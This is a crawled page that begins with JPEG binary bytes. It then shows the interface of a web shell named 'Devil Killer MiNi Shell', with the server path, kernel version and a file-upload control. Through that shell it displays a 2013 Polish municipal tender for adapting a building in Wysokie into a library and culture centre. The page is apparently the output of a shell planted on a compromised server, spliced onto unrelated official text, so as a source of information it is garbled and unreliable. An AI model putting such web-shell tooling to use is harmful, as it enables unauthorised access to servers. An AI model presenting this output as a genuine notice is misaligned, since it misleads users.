JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130826/342530-N-2013.html

<p class="kh_header"><b>Zamość: Adaptacja budynku na Gminną Bibliotekę Publiczną i Ośrodek Kultury w miejscowości Wysokie</b><br>
<b>Numer ogłoszenia: 342530 - 2013; data zamieszczenia: 26.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zamość , ul. Peowiaków 92, 22-400 Zamość, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ugzamosc.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku na Gminną Bibliotekę Publiczną i Ośrodek Kultury w miejscowości Wysokie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> STAN   ISTNIEJĄCY:

Budynek murowany piętrowy, częściowo podpiwniczony z drewnianą więźbą dachową . Schody i stropy drewniane. 
Budynek wyposażony jest w instalację wodociągową, kanalizacyjną (do zbiornika bezodpływowego), elektryczną, gazową, i telefoniczną. 
Części murowane są w dobrym stanie technicznym. Stropy i schody wymagają wymiany. Część tynków zewnętrznych jest w złym stanie technicznym. Budynek wymaga docieplenia.

KONCEPCJA   PROJEKTOWA:

 Przeznaczenie budynku i  charakterystyka funkcji
Budynek jest adaptowany na gminną bibliotekę (parter), salę wielofunkcyjną o funkcji kulturalno - oświatowej z zapleczem ( piętro )  .
Pomieszczenia biblioteki i sali wielofunkcyjnej będą wyposażone w wentylację mechaniczną.
W drugim etapie przewiduje się adaptację poddasza.
W pierwszym etapie poddasze będzie nieużytkowe, ale zostaną zamontowane okna połaciowe, a ocieplenie zostanie umieszczone w płaszczyźnie połaci dachowych i nad podsufitką na poziomie 250 cm nad podłogą poddasza.
Zostanie zachowane dotychczasowe wejście główne do budynku i wykonane dodatkowe wejście w elewacji zachodniej . Umożliwi to niezależne korzystanie z piętra i poddasza po zamknięciu biblioteki. Istniejące zewnętrzne zejścia do piwnic zostaną zlikwidowane, w zamian zaprojektowano zejście do piwnic z klatki schodowej.
Charakterystyka pomieszczeń
KONDYGNACJA   PIWNIC
kotłownia, klatka schodowa, pomieszczenia magazynowe;
w kotłowni zaprojektowano okna o pow. 1/15 pow. podłogi

KONDYGNACJA PARTERU
Klatka schodowa, dwie sale mieszczące księgozbiór, dwie sale czytelni ze stanowiskami komputerowymi, pokój socjalny (wyposażony w umywalkę i zlewozmywak jednokomorowy wbudowany w szafkę kuchenną, szafkę ubraniową, stolik z krzesłami), dwa pomieszczenia biurowe, sanitariat dla kobiet z przystosowaniem do korzystania przez niepełnosprawnych, sanitariat dla mężczyzn, 
KONDYGNACJA PIĘTRA
sala wielofunkcyjna (funkcja kulturalna, oświatowa, szkoleniowa) z zapleczem kuchennym (przygotowanie kawy, herbaty - naczynia jednorazowe), garderoba z sanitariatem, pomieszczenie porządkowe, szatnia ogólnodostępna, sanitariat damski i męski z przedsionkami, salka komputerowo, klatka schodowa.

 DANE LICZBOWE:	

powierzchnia użytkowa:573,59 m2 +  pow. podłogi poddasza nieużytkowego-229,38 m2
powierzchnia całkowita:1047,85m2
kubatura: 3 413m3

 OPIS ROZWIĄZAŃ KONSTRUKCYJNO- BUDOWLANYCH :

Prace rozbiórkowe:

Piwnica: należy rozebrać zaznaczone ścianki działowe, schodki zewnętrzne prowadzące do piwnicy
Wybrać grunt w projektowanym pom. 001 i 002, pogłębić część pomieszczenia 004,
przekuć drzwi z pom 001 do 002, wykuć bruzdy na przewody kominowe w pom. 004 i 006
strop nad 006 i 007.
 Parter: należy rozebrać zaznaczone ścianki działowe, stropy nad parterem ( z wyjątkiem stropu nad pom. 106-109), schody drewniane z parteru na piętro, daszki nad schodkami zewnętrznymi prowadzącymi do piwnicy, taras od strony południowej.
Rozebrać etapami filarki międzyokienne i nadproża nad oknami w pomieszczeniach 07, 08, 09 i sukcesywnie odtworzyć te elementy z cegły pełnej i z belek typu L19.

Przekuć drzwi z pom 101 do 112,102/103, 103/104, 106/110 , wykonać otwór na drzwi zewnętrzne do pom. 111, okna w pom. 104, powiększyć okna w pom. 102, 107, 108, 109
wykuć bruzdy na przewody kominowe .
Piętro:  należy rozebrać zaznaczone ścianki działowe, stropy nad piętrem oraz rozebrać nadproża nad oknami I piętra, na których opierają się stropy.
.
Przekuć drzwi z pom 202 do 203,202/205, 203/211, 203/213 , 205/207 wykonać okna w pom. 202,208, 210, 212 powiększyć okna w pom. 215. 
wykuć bruzdy na przewody kominowe .
		wykonać otwory nawiewne w pom. 202.
Poddasze: Skuć  ścianki zewnętrzne na poziomie poddasza oraz rozebrać nadproża nad oknami I piętra
Rozebrać pokrycie dachu i więźbę dachową  oraz kominy.

Skuć zniszczone tynki.

Fundamenty:

 W części niepodpiwniczonej - fundamenty istniejące  jedynie pod wewnętrzną ścianę podłużną przewidziano podbicie ławą betonową .
.
W części podpiwniczonej podbicia fundamentów ławami z betonu B20 i podmurowania ścian murem z cegły ceramicznej pełnej klasy 15MPa na zaprawie marki 5MPa. Szczegóły wg proj. konstrukcyjnego.

Ściany konstrukcyjne piwnic, uzupełnienia ścian konstrukcyjnych na piętrze, słupy:

Z cegły pełnej kl 15 MPa na zaprawie cem.-wap. marki 10MPa .
słupy w pom.108 i 113:
Z cegły pełnej kl 20 MPa na zaprawie cem.-wap. marki 10MPa .


Zewnętrzne ściany szczytowe oraz wewnętrzna ścianka konstrukcyjna i ścianki klatki schodowej na poddaszu:
z bloczków gazobetonowych odmiany 600 na zaprawie cem.-wap. marki 5MPa.

Ocieplone od zewnątrz styropianem samogasnącym gr. 10cm ( miejscami ocieplenie pogrubione lub pocienione w celu uzyskania zamierzonego rysunku elewacji).

Słupki i filarki międzyokienne przy oknach O4 i O10:
Z cegły pełnej kl 15 MPa na zaprawie cem.-wap. marki 10MPa .

Ścianki działowe:
 W piwnicy- z cegły pełnej.
Na wyższych kondygnacjach w pomieszczeniach wilgotnych z cegły dziurawki w pozostałych pomieszczeniach z bloczków komórkowych M600 na zaprawie cem.-wap. 5MPa.
Ścianka wypełniająca otwór wokół drzwi S3 między pomieszczeniami 101 i 110 oraz ścianka nad drzwiami S5-  z płyt gipsowo-kartonowych 2X1.25cm ogniochronnych lub innej grubości o odporności ogniowej EI 60.
Obudowa ścianek kolankowych na poddaszu z płyt gipsowo-kartonowych ogniochronnych EI60 od wewnętrznej strony oraz płyt OSB od strony zewnętrznej.
W drugim etapie budowy na poddaszu należy wykonać ścianki działowe z płyt gipsowo-kartonowych. 

Stropy pod poddaszem nie są przystosowane do murowanych ścianek działowych !!!

Stropy
Nad piwnicami- nad pom. 103-105 istniejący strop Kleina, projektowany strop WPS .Stropy obłożyć od spodu płytami gipsowo-kartonowymi 2x 1.25 wodoodpornymi i ogniochronnymi o odporności ogniowej EI60.
Nad parterem - istniejący i projektowane- WPS
Nad piętrem- stropy Teriva I i Teriva II, w klatce schodowej - WPS
Stropy WPS nad parterem i piętrem obłożyć od spodu płytami gipsowo-kartonowymi 2x 1.25  ogniochronnymi o odporności ogniowej EI60


Wieńce , nadproża i podciągi :
wg. proj. konstrukcyjnego.
W poziomie stropu nad parterem, stężenie ścian ceglanej części budynku przez wklejenie prętów ocynkowanych fi  6mm, w oczyszczone, puste spoiny zewnętrzne przy użyciu zaprawy montażowej , wg proj.  konstrukcji. 
Stężenie dobudowanej części budynku z gazobetonu przy pomocy ściągów stalowych  O22mm wg proj. konstrukcji.

Nadproża z belek prefabrykowanych typu L19, z belek stalowych, żelbetowe i typu kleina wg proj. Konstr.
Część istniejących nadproży wzmacnianych przez wklejenie prętów ocynkowanych w puste spoiny.

Podciągi stalowe z belek walcowanych dwuteowych wg  proj. Konstrukcji.

Schody: 
Główne wewnętrzne- żelbetowe wg proj. konstr.
Schody zewnętrzne na gruncie- płyta betonowa gr. 10cm.
W pom. 301 schody składane, stalowe, nożycowe.
Od strony poddasza klapa schodów powinna być obudowana płytą gipsowo-kartonową ogniochronną gr. 1.25cm.

 Balkon:
Żelbetowy wg proj. konstrukcyjnego.

Więźba dachowa:
Drewniana z drewna klasy K27 zabezpieczona środkami grzybo i owado-bójczymi oraz ogniochronnymi.

Pokrycie dachu i akcesoria dachowe:
Pokrycie blachy dachówkowej, powlekanej  
Ławy kominiarskie i drabinki kominiarskie montowane wg wskazań producenta.
Drabinki krótsze niż 240cm należy skrócić we własnym zakresie.

Odprowadzenie wody z dachu:

Rynny i rury spustowe i obróbki blacharskie  z blachy powlekanej w kolorze dachu. Dolna część rur spustowych żeliwna.
Wokół budynku należy wykonać szczelną opaskę szer. min. 100m, spadek 2% od budynku. 

Wentylacja i przewody kominowe:

Przewód spalinowy wykonać z cegły pełnej kl.15MPa na zaprawie cem. marki 5MPa, wyłożyć wg projektu instalacyjnego.
Większość pomieszczeń wentylowanych grawitacyjnie. 
Przewody wentylacyjne z pustaków obudowanych na poziomie parteru i piętra płytą gipsowo- kartonową 1.25 cm ( w pomieszczeniach mokrych płyta wodoodporna ), a na poddaszu ściankami z cegły pełnej gr. 12cm. W kominach odsuniętych od wewnętrznej ściany poddasza- ścianki od strony ściany konstrukcyjnej zacząć od poziomu +9,55 opierając je na ceowniku -160 ułożonym płasko na ściankach bocznych. 
Kominy zakończone betonowymi czapami. Otwory went. osiatkowane i osłonięte żaluzjami.
Uwaga: w miejscach gdzie znajdą się pionu kanalizacyjne można nie wbudowywać pustaków.

Poziome przewody wentylacyjne z PCV lub blachy powlekanej.

W zachodniej i wschodniej ścianie szczytowej znajdują się po 4 nawiewne otwory wentylacyjne, osiatkowane i osłonięte żaluzjami.
W kalenicy wywiewna szczelina wentylacyjna wg rys. nr 13

W piwnicy kanał nawiewny typu  - Z wykonany w istniejącej ścianie. Wlot 30 cm nad poziomem terenu. Wylot w piwnicy nad podłogą - przewód wewnątrz piwnicy z blachy stalowej powlekanej.

Wentylacja mechaniczna:

W pomieszczeniu 202 wentylatory dachowe oraz otwory wentylacyjne wg proj. instalacyjnego.

Wentylatory wyciągowe na w pomieszczeniach 113, 114, 116, 118, 207, 212, 214. W pomieszczeniach gdzie przewidziano tylko jeden przewód wentylacyjny należy zastosować kratki wentylacyjne z częścią dolną zapewniającą wentylację grawitacyjną i górną częścią przeznaczoną do montażu wentylatora. Wentylatory są zintegrowane z włącznikami światła i mają opcję opóźnionego wyłączania.
Nawiew do tych pomieszczeń przez kratki nawiewne w drzwiach .	

Ponadto w pom. 107i 206  zaprojektowano okapy.
W drugim etapie budowy okap będzie też zainstalowany w pomieszczeniu socjalnym na poddaszu.

We wszystkich oknach przewidziano możliwość utworzenia szczeliny wentylacyjnej.

Wentylowane powinny być również przestrzenie między wełną mineralną, a pokryciem dachowym, oraz przestrzeń nad sufitem poddasza. Otwory nawiewne (osiatkowane) -w ścianach szczytowych, otwory wywiewne- w kalenicy- szczegół zakończenia kalenicy-rys.13.

Izolacje przeciwwilgociowe i parochronne:

Poziome - piwnice i parter-podłogi na gruncie :  papa asfaltowa zgrzewalna na osnowie z tkaniny szklanej lub włókniny poliestrowej (albo folia izolacyjna) wywinięta na ściany.
Balkon- 1x folia izolacyjna lub papa na osnowie z włókna sztucznego.
 W sanitariatach folia w płynie zachodząca 30 cm na ściany.
Ściany, izolacje poziome: 
W piwnicach, przy pomieszczeniach 001,  006, 007-projektowane podbicia fundamentów ławą betonową . Beton wykonać jako wodoszczelny  środka uszczelniającego o podobnym działaniu.

Przy pozostałych pomieszczeniach piwnic w trakcie podbijania fundamentów należy na wylanej ławie betonowej ułożyć izolacje poziomą z folii izolacyjnej i na niej podmurować cegłą pełną istniejącą ścianę piwniczną.
Pionowe: 
Pionowa izolacja ścian fundamentowych i cokołów ( z wyjątkiem ścian i cokołów przy pom. 003, 004, 005 )
z masy izolacyjnej - na cokole należy położyć 3 warstwy  : warstwę gruntującą z rozcieńczonego izolatora, warstwę zasadniczej izolacji przeciwwilgociowej , warstwę przyklejającą styropian.
Ze względu na to , że ściany piwnic przy pomieszczeniach 003, 004, 005 są wykonane z cegły silikatowej i  bloczków komórkowych należy zastosować izolację typu średniego
Izolacja pozioma ścian fundamentowych powinna się łączyć z izolacją podłogi oraz izolacją pionową cokołów .

izolacja powinna sięgać od fundamentów do górnej granicy cokołu.
 Detal cokołu- rys. nr 12
Dopuszcza się użycie materiałów o podobnych właściwościach produkowanych przez inne firmy.


Izolację pionową i poziomą bardzo dokładnie połączyć ze sobą ! 

Pod pokryciem dachowym projektuje się folię wstępnego krycia o dużej paroprzepuszczalności- min.1600g/m2/24h.

Nad sufitami z płyt gipsowo-kartonowych i w ściankach kolankowych na poddaszu i na stropach- folia paroizolacyjna  na złączach klejona lub uszczelniona wskazanymi przez producenta taśmami klejącymi.

Izolacje  termiczne  i  akustyczne:

Ściany piwnic - styropian -8cm k=0.38W/m2xK.
Ściany zewnętrzne wyższych kondygnacji - styropian -10cm k=0.32W/m2xK.
Na części ścian styropian pogrubiony do 13 cm w celu uzyskania projektowanego rysunku elewacji.
Przed klejeniem styropianu usunąć stary , odpadający tynk i całą elewację dokładnie umyć agregatem ciśnieniowym. (może lepiej byłoby wykonać surowy tynk na cegle aby wyrównać powierzchnię pod klej i styropian 

Parter-podłoga na gruncie- styropian- 10cm
Nadwieszenie nad wejściem głównym- styropian- 18cm ( należy ukryć belki stalowe podpierajace strop )
Stropy nad piętrem w nieużytkowych częściach poddasza- wełna szklana- 18cm
Stropodach i ścianki kolankowe na poddaszu -wełna szklana o izolacyjności min. 0,045 W(mxK)- 18cm - k=0.29W/m2xK.
Strop nad piwnicami - 8cm wełny mineralnej
Przewody wentylacyjne z rur stalowych nad sufitem poddasza zaizolować min. 10cm wełny szklanej.
Projekt spełnia wymogi Dz.U. Nr 10 z 95r. z późniejszymi zmianami.

Na stropach nad piwnicą, parterem i piętrem zaprojektowano warstwę styropianu do izolacji akustycznych - 3cm . Jedynie nad pomieszczeniem 215- warstwę styropianu PS-E FS20- 5cm- jako wypełnienie w celu osiągnięcia odpowiedniego poziomu podłogi.

Okna i drzwi :

Drzwi zewnętrzne oraz S1, S2, S4-aluminiowe 
Drzwi przeszklone S3 i S6 - stalowe o odporności ogniowej EI 30
Drzwi S5 o odporności ogniowej EI 30 połączone ze ścianką stalową przeszkloną o odporności ogniowej EI 60.
Pozostałe drzwi przy klatce schodowej oraz drzwi do piwnicy i do kotłowni- EI 30.
Pozostałe wewnętrzne - typowe  wzmocnione

Miedzy pomieszczeniem 101 a 102 i 105- przeszklone gabloty w ramach aluminiowych- jak drzwi, wg rys. nr 27
Okna-
Na poddaszu , przy klatce schodowej okno oddymiające.
Pozostałe okna piwnic, parteru i piętra z PCV,  ze szczeliną wentylacyjną. 
Na poddaszu okna połaciowe 
 Podłogi:
wg opisu na rzutach.
Pod podłogi  na wylewce zbrojonej należy wykonać wylewkę samopoziomującą.

Wykończenie ścian od wewnątrz i elementy wykończenia wnętrz:
Tynk cem.-wap. kat. III.
Parapety- aglomarmur. W sanitariatach parapety z płytek ceramicznych. 

Okładziny ścian:
W  w.c. oraz pomieszczeniach 206 i 207  - glazura do wys. 200cm.
przy ścianach z umywalkami, zlewozmywakami i kuchenkami ( w pom. 107, 118 ) - glazura do wys. 2m
Kotłownia- glazura na pełną wysokość, pozostałe pomieszczenia w piwnicy - do wys. 1.8m ściany zmywalne. 
Pozostałe pomieszczenia malowane farbą emulsyjną.

Wszystkie elementy drewniane w pomieszczeniach dostępnych od wewnątrz budynku ( w tym na poddaszach nieużytkowych) muszą być obudowane płytami gipsowo-kartonowymi ogniochronnymi gr. 2x 1.25cm na ruszcie drewnianym albo stalowym, lub płytami o innej grubości zapewniającymi uzyskanie odporności ogniowej EI 60.
Płytą gipsowo-kartonową obudować również poziome przewody instalacji wentylacji mechanicznej i grawitacyjnej oraz przewody kominowe dostawione do ścian.

Sufity podwieszane z płyt gipsowo-kartonowych 1.25cm należy wykonać na wys. 250 cm od podłogi w pomieszczeniach o niewielkiej powierzchni ( 106, 107, 108, 109, 112, 113, 114, 115, 116, 203, 205, 209, 211, 212, 213, 214.
W pomieszczeniach wilgotnych na płytach g.-k. Należy ułożyć folię paroizolacyjną.

Balustrada schodów stalowa z drewnianym pochwytem wg rys. 18,19,20
Przy spocznikach klatki schodowej zamontować barierkę zabezpieczającą- rys. nr 21.

Elementy stalowe malować farbą przeciwrdzewną gładką.

W w.c. dla niepełnosprawnych na parterze zamontować 2 uchwyty podnoszone.

Przy szatni na piętrze należy wykonać ladę z płyty postforming opartej na stelażu z płyt wiórowych okleinowanych rys. nr 26
Projektuje się zamkniecie szatni żaluzją umieszczoną przy nadprożu od strony pomieszczenia z wieszakami.
 
Wykończenie  ścian  zewnętrznych:

Na nieotynkowanych fragmentach ścian wykonać tynk kategorii I
Na styropianie tynk cienkowarstwowy akrylowy malowany farbą akrylową.
Parapety - blacha powlekana.

Okładziny  zewnętrzne:
Cokół -gresy. 
Przy balkonie i cokolik wys. 15cm z gresów.
Schodki i pochylnia- lastriko płukane.

Murek  przy  oknach  piwnicy:
Z cegły pełnej nad nim daszki ze szkła zbrojonego- rys. nr 24

Balustrady balkonu i wejścia na zaplecze kawiarenki:
 Stalowe-wykonać  wg rys. 16, 17

Wycieraczki:
Przy wejściach umieścić stalowe wycieraczki.

Wyłaz na dach :
Typowy 
Między sufitem nad poddaszem, a dachem na ściance wychodzącej nad dach zamontować stalową drabinkę- rys. nr 25.
Przejście od schodów nożycowych do dachu musi być obudowane płytami g.-k. Ogniochronnymi 2x1.25cm , podobnie krokwie dachowe.

Impregnacje:

Części drewniane budynku zabezpieczyć środkami grzybo- i owadobójczymi oraz ogniochronnymi.
Drewniane elementy zewnętrzne zaimpregnować lakierem podkładowo-gruntującym 

Pochylnia:

 Fundamenty i ścianki jak fundamenty tarasu-cegła pełna kl.10 MPa na zaprawie marki 5 MPa.
Izolacja przeciwwilgociowa:
Pionowa- 2x Abizol . Pozioma- folia lub papa zgrzewana.
Nawierzchnia - lastriko płukane.
Podkład cementowy należy zdylatować co 1m oraz przy ściankach pochylni. 
Okładzina ścianek- gresy.
Balustrady wg rys. nr 14, 15, 16

Daszki  nad  wejściami:
Konstrukcja stalowa, pokrycie z blachy płaskiej w kolorze dachu , podsufitka z paneli aluminiowych. Rys. nr 23, 22.

 Daszki  nad  studzienkami  piwnic:
Ze szkła zbrojonego rys. nr 24

Kolorystyka:
Kolory dobrano wg skali NCS.

Dach- w kolorze dachówki ceramicznej( jak najmniej jaskrawym).
Obróbki blacharskie i akcesoria dachowe w kolorze dachu.
Kominy
Ściany - kolor podstawowy-  ( jasno  piaskowy)
Górna część ścian  - kolor uzupełniający- ( piaskowy- ciemniejszy od podstawowego)
Stolarka okienna - biała,  drzwiowa- piaskowa- 
Cokół, schody - gresy w kolorze terakoty .
Nawierzchnia pochylni- lastriko płukane barwione na kolor cokołu
Balustrady i inne elementy stalowe- piaskowe-  ( ciemno piaskowy ).




INSTALACJE-

wod.-kan. c.o. z kotłowni gazowej umieszczonej w piwnicy
ciepła woda z podgrzewacza pojemnościowego w kotłowni
Instalacja p.poż. - na każdej kondygnacji ( oprócz piwnic ) zaprojektowano po 1 hydrancie  Fi 25.

oświetlenia podstawowego , oświetlenia awaryjnego , gniazd wtykowych, gniazd wtykowych zasilania komputerów,  sieć telefoniczna, instalacja ochrony od porażeń, instalacja odgromowa instalacja sygnalizacji awarii urządzeń kotłowni ,wyłącznik główny p.poż.
Odprowadzanie ścieków do istniejącego zbiornika bezodpływowego.

Zamawiający przewiduje płatności częściowe:
1. Za wykonane prace  do końca września 2014 r., płatność w 2014 r.
2. Za wykonane prace do końca marca 2015 r., płatność w 2015 r.
Zamawiający przewiduje   udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt.6 ustawy prawo zamówień publicznych, do 50 % .
Po wyborze ofert ( przed podpisaniem umowy) - Wykonawca z najkorzystniejszą ofertą ( cena 100%), przedstawi Zamawiającemu HARMONOGRAM RZECZOWO - FINANSOWY.
Zamawiający dopuszcza rozwiązania równoważne.
Jeśli w dokumentacji technicznej, stanowiącej załącznik do SIWZ zostały wprowadzone nazwy własne materiałów lub produktów, Zamawiający dopuszcza zastosowanie produktów równoważnych do wskazanych pod warunkiem posiadania przez te materiały i produkty nie gorszych parametrów technicznych, charakteryzujących wskazany produkt stanowiący o ich przydatności, charakterze, wytrzymałości..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.20.00.00-9, 45.40.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.
Zamawiający wymaga wniesienie ZNWU.
Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
Jeżeli Wykonawca jest jednocześnie gwarantem zabezpieczenie służy także pokryciu roszczeń z tytułu gwarancji jakości i rękojmi za wady.

Wysokość zabezpieczenia należytego wykonania umowy.
Zamawiający ustala zabezpieczenie należytego wykonania umowy zawartej w wyniku postępowania o udzielenie niniejszego zamówienia w wysokości 10% ceny całkowitej brutto podanej w ofercie ( z podatkiem VAT ), wybrany Wykonawca zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy, ale przed jej podpisaniem.

Forma zabezpieczenia należytego wykonania umowy
Zabezpieczenie należytego wykonania umowy może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:
1/ pieniądzu (przelew na rachunek bankowy zamawiającego): 
2/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3/ gwarancjach bankowych
4/ gwarancjach ubezpieczeniowych
5/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2007 r. nr 42,poz 275 ).
Zabezpieczenie wnoszone w formie pieniężnej Wykonawca wpłaci przelewem na następujący rachunek bankowy Zamawiającego: 85 2030 0045 1110 0000 0230 3780
Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.
ZNWU będzie wymagalne w wysokości 10% ceny całkowitej z VAT podanej w ofercie.
Zapłata kwoty stanowiącej zabezpieczenie wykonania umowy nastąpi bezspornie po otrzymaniu od Zamawiającego pierwszego wezwania na piśmie.
